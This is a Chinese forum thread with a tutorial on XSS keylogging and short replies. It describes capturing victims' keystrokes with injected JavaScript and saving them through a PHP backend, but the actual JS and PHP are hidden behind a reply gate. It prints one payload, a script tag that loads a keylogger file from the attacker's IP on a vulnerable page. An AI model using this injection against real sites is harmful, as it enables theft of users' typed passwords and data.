利用XSS进行键盘记录

admin · 发表于 2019-4-10 19:57:20

准备
原理分析：
我们利用前端js记录键盘操作，然后将键盘记录通过php保存到本地。
前端js

游客，如果您要查看本帖隐藏内容请回复

将192.168.123.231改成你的ip地址或者域名。
后端PHP

游客，如果您要查看本帖隐藏内容请回复

将这两个文件放到服务器或者apacher更目录

启动apacher
[pre]
service apache2 start
[/pre]
提交
在存在xss攻击的页面处我们提交恶意js

<script type="text/javascript" src="http://192.168.123.231/kk.js" language="JavaScript"></script>

复制代码

我们在随便输入文字内容

记录的内容

当然这两个附件我打包了，可以自己测试下！

shery · 发表于 2019-4-10 20:27:33

楼主厉害，学习了

Richard · 发表于 2019-4-11 14:42:30

学习学习，支持大佬

xiaojiangyihao · 发表于 2019-4-11 11:06:54

我来学习一下

libo · 发表于 2019-4-10 20:44:25

支持大佬！

xuchao · 发表于 2019-4-12 08:33:35

查看内容

日月lsj · 发表于 2019-4-13 10:22:56

tql tql tql tql tql

Tu-TuJiang · 发表于 2019-4-13 11:16:38

希望看到隐藏内容

Tu-TuJiang · 发表于 2019-4-13 11:31:01

我测试了下，根本输入不了那么多的字符在文本框内
，恶意代码写不进去

陈松 · 发表于 2019-4-13 16:17:02

我想看这个东西ok不，烦不烦